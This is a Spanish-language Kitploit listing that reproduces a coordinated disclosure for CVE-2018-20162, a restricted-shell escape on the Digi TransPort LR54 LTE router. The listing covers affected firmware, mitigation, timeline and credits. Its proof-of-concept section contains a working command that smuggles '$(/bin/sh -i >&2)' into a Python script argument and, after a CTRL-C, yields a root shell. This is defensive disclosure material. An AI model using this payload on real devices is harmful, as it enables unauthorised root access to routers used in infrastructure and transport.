Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2018-20162-digi-lr54-restricted-shell-escape — Exploit de prueba de concepto para CVE-2018-20162: escape de sandbox en el router Digi TransPort LR54 LTE mediante un fallo en el manejo de SIGINT, que proporciona acceso a shell root. | Kitploit
Herramientas/GitHubGitHub/stigtsp/cve-2018-20162-digi-lr54-restricted-shell-escape
Seguridad de Sistemas EmbebidosEscalada de PrivilegiosSeguridad IoTAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónSeguridad de Hardware e IoTRed Teaming

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
GitHub
stigtsp/cve-2018-20162-digi-lr54-restricted-shell-escape

CVE-2018-20162-digi-lr54-restricted-shell-escape

Exploit de prueba de concepto para CVE-2018-20162: escape de sandbox en el router Digi TransPort LR54 LTE mediante un fallo en el manejo de SIGINT, que proporciona acceso a shell root.

Ver Repositorio
2hace 7 añosAún no revisado

layout: post title: "CVE-2018-20162: Escape del shell restringido de Digi TransPort LR54" author: sgo category: seguridad

El Digi TransPort LR54 es un router LTE de alta velocidad comúnmente utilizado por la industria, infraestructura, comercio minorista y transporte público.

Soporta la ejecución de scripts de Python en un sandbox restringido y tiene un shell personalizado accesible a través de SSH que está sujeto a las mismas restricciones. Por lo tanto, el sistema operativo subyacente es inaccesible para el administrador.

He encontrado una forma de escapar del sandbox y obtener un shell de root explotando la forma en que la CLI maneja los argumentos de línea de comandos al ejecutar scripts de Python:

Cuando un proceso interactivo de Python recibe un SIGINT (a través de CTRL-C), los argumentos del script no se escapan correctamente cuando se pasan al manejador de registro de errores de la CLI interactiva. Esto permite a un atacante ejecutar comandos arbitrarios como root.

Para explotar esta vulnerabilidad, un atacante necesita tener acceso interactivo a la CLI con privilegios 'super'. Un usuario con este nivel de acceso está habilitado por defecto en el dispositivo.

Vulnerable

Digi Transport LR54 (y posiblemente productos relacionados como WR64 y WR54)

Versión de firmware: 4.4.0.26 10/29/2018 21:14:06 Versión de firmware: 4.3.2.24 09/06/2018 00:58:34

Y posiblemente versiones anteriores

Mitigación

Los usuarios deben actualizar a la versión de firmware 4.5.1.4 o superior. Los secretos almacenados en el dispositivo, como claves privadas y contraseñas, deben cambiarse como medida de precaución.

Prueba de concepto

  1. Subir sleep.py al LR54 usando scp o sftp, que contenga:
root@kitploit:~
import time;time.sleep(10)
  1. Ejecutar el siguiente comando en la CLI del LR54:
root@kitploit:~
python sleep.py --XXX $(/bin/sh -i >&2)
  1. Inmediatamente presionar CTRL-C después de que el programa comience

  2. Entonces se te deja en un shell interactivo de root

root@kitploit:~
/home/digi/user # uname -a
Linux (none) 3.10.14 #1 SMP Mon Oct 29 16:18:10 CDT 2018 mips GNU/Linux
/home/digi/user # id
uid=0(root) gid=2000(users_rw) groups=2000(users_rw),2002(users_super)

Cronología

  • 2018-12-13: Vulnerabilidad descubierta
  • 2018-12-14: PoC creado, Proveedor notificado
  • 2018-12-14: Proveedor confirmó, embargo de 60 días. Solicitado CVE.
  • 2018-12-15: CVE-2018-20162 asignado
  • 2018-12-31: Recibido firmware pre-lanzamiento. Confirmado no vulnerable.
  • 2019-01-02: Proveedor lanza firmware corregido 4.5.1.4
  • 2019-01-25: Proveedor actualizó notas de lanzamiento para referenciar CVE-2018-20162
  • 2019-02-13: Proveedor aprobó divulgación, embargo levantado

Referencias

  • https://www.digi.com/products/networking/cellular-routers/digi-transport-lr54
  • http://ftp1.digi.com/support/firmware/transport/LR54/v4.5.1.4/93001306_L.pdf
  • https://www.digi.com/resources/security
  • https://blog.hackeriet.no/cve-2018-20162-digi-lr54-restricted-shell-escape
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20162

Créditos

Vulnerabilidad descubierta por Stig Palmquist.

Gracias a @duniel_pls y @alexanderkjall por revisar este informe.

Descargar herramienta